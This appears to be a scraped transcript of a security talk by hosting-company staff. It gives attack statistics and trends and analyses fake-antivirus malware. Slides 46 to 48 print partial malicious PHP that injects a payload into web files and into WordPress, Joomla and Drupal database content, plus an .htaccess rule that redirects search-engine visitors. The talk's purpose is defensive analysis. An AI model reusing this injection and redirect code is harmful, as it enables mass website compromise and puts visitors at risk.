Presentation is loading. Please wait.

Presentation is loading. Please wait.

Ganesh Devarajan & Todd Redfoot. Introduction  Todd Redfoot  Chief Information Security Officer  Ganesh Devarajan  Sr. Security Architect.

Similar presentations


Presentation on theme: "Ganesh Devarajan & Todd Redfoot. Introduction  Todd Redfoot  Chief Information Security Officer  Ganesh Devarajan  Sr. Security Architect."— Presentation transcript:

1 Ganesh Devarajan & Todd Redfoot

2 Introduction  Todd Redfoot  Chief Information Security Officer  Ganesh Devarajan  Sr. Security Architect

3 The Background (What does Go Daddy do?)

4

5 What does Go Daddy do?  9.4 Million Customers  48 Million Domains Under Management  Over 5 million Active Hosting Accounts  1/3 of all DNS queries run through our servers  We register, renew or transfer more than one domain name every second

6 What does Go Daddy do?  40+ Security Professionals in Team  24 x 7 Operations Center  Research  Engineering  Forensics  Customer Security Advisors  Penetration Testing  User Administration  Development

7

8 The Numbers (What does Go Daddy see?)

9 What do we see?  Monitor over 100,000 events per second  8.6 Billion/Day  DDoS - ~900 Attacks per day / 6K per week  Feb Largest 21M pps  Last Week – 40G Attack  Brute Force – 3.5M per hour

10 What do we see?  “Other” Attacks :  425K – Invalid Directory Traversal  90K – XSS Prevention  115K – SQL Injection Prevention … all in a 24 hour period…

11 Current Trends

12 SSH Brute Forcers

13 Englewood, Colorado 140 Million attempts

14 MS-SQL Brute Forcers

15 Orlando, FL 348 Million attempts

16 My-SQL Brute Forcers

17

18 FTP Brute Forcers

19 XingPing, CN 12 Million attempts

20 Brute Forcers - All

21 Brute Forcers - US Garden City, NY 75.7 Million attempts

22 Brute Forcers - CN Datong, CN 22.5 Million attempts

23 Brute Forcinator

24 SQL Injection

25 Seattle, WA 1.3 Million attempts

26 Backdoor Shells

27 Phone Company (91%) Mountain View, CA

28 PHP Attacks

29 Berlin, Germany 1.9 Million attempts

30 PHP Attacks Montreal, CA 1.1 Million attempts

31 Botnet

32

33 Source - https://zeustracker.abuse.ch/

34 Botnet Source -

35 Phishing

36 The Good, Bad and Ugly?

37 The Bad – Most Events

38 The Ugly – Security Events & DDoS

39 New Trends

40 Recent Changes  “Hacktivists”  Lulzsec = Twitter  ComodoHacker = Pastebin  Phishing -> Spear Phishing  Targeted & Coordinated Attacks  RSA / Lockheed Martin Connection

41 What’s in the News?

42  More Client-side Exploits  Browser exploits  Adobe exploits  Web Server Compromises  Brute Force Attacks  Leveraging Web Application Vulnerabilities  Config files with passwords More of the same…

43  Scareware  Reports fake viruses to users  Asks for fee to remove the threat  Paying does nothing but give them your CC#  $10 Million in Revenue last year Fake AV

44 Fake AV Analysis

45 Registrant: Hilary Kneber fax: /2 Sun street. Montey 29 Virginia NA 3947 Fake AV – Attack Breakdown

46 $z=$_SERVER["DOCUMENT_ROOT"]; $encoded=' $val=$z; $totalinjected=0; echo "Working with $val\n!!STARTING!!"; ob_flush(); $start_time=microtime(true); if ($val!="")do_folder($val); $end_time=microtime(true)-$start_time; echo "|Injected| $totalinjected files in $end_time seconds\n"; Fake AV – Sample Shell

47 … $insert=' ';... $link=mysql_connect($host,$user,$pass); if (!$link) { die('Could not connect: '. mysql_error()); }else{ echo 'Connected successfully'."\n"; $db_list = mysql_list_dbs($link); $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; } … //wordpress if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; } //joomla if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; } //drupal if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; } if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; } Fake AV – DB Variant

48 Fake AV - Search Redirect RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER}.*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*search.yahoo*$ [NC] RewriteRule.* [R,L] addhandler x-httpd-php-cgi.php4 addhandler x-httpd-php5-cgi.php5 addhandler x-httpd-php5-cgi.php

49 Custom Monitoring

50 UDP Flooder

51 How to Protect?

52 Website Vulnerability Scanners  Website Protection -Site Scanner ($48/Year)  Beyond Security($99.95/Year)  McAfee Secure TM (~$2100/Year)  WhiteHat Security®  IBM AppScan®  Cenzic®  HP WebInspect®

53 Web Based Malware Detection  Virtual machine Honey pots  Monitor Creation of new Processes, File system or Registry entries, etc.  Browser Emulation  Reputation Service  Internet’s black list  Signature Based Detection/Prevention  Intrusion Detection System/Intrusion Prevention System  Anti-Virus

54 New Methodologies

55 Questions?

56 Thank You  Ganesh Devarajan   Todd Redfoot 


Download ppt "Ganesh Devarajan & Todd Redfoot. Introduction  Todd Redfoot  Chief Information Security Officer  Ganesh Devarajan  Sr. Security Architect."

Similar presentations


Ads by Google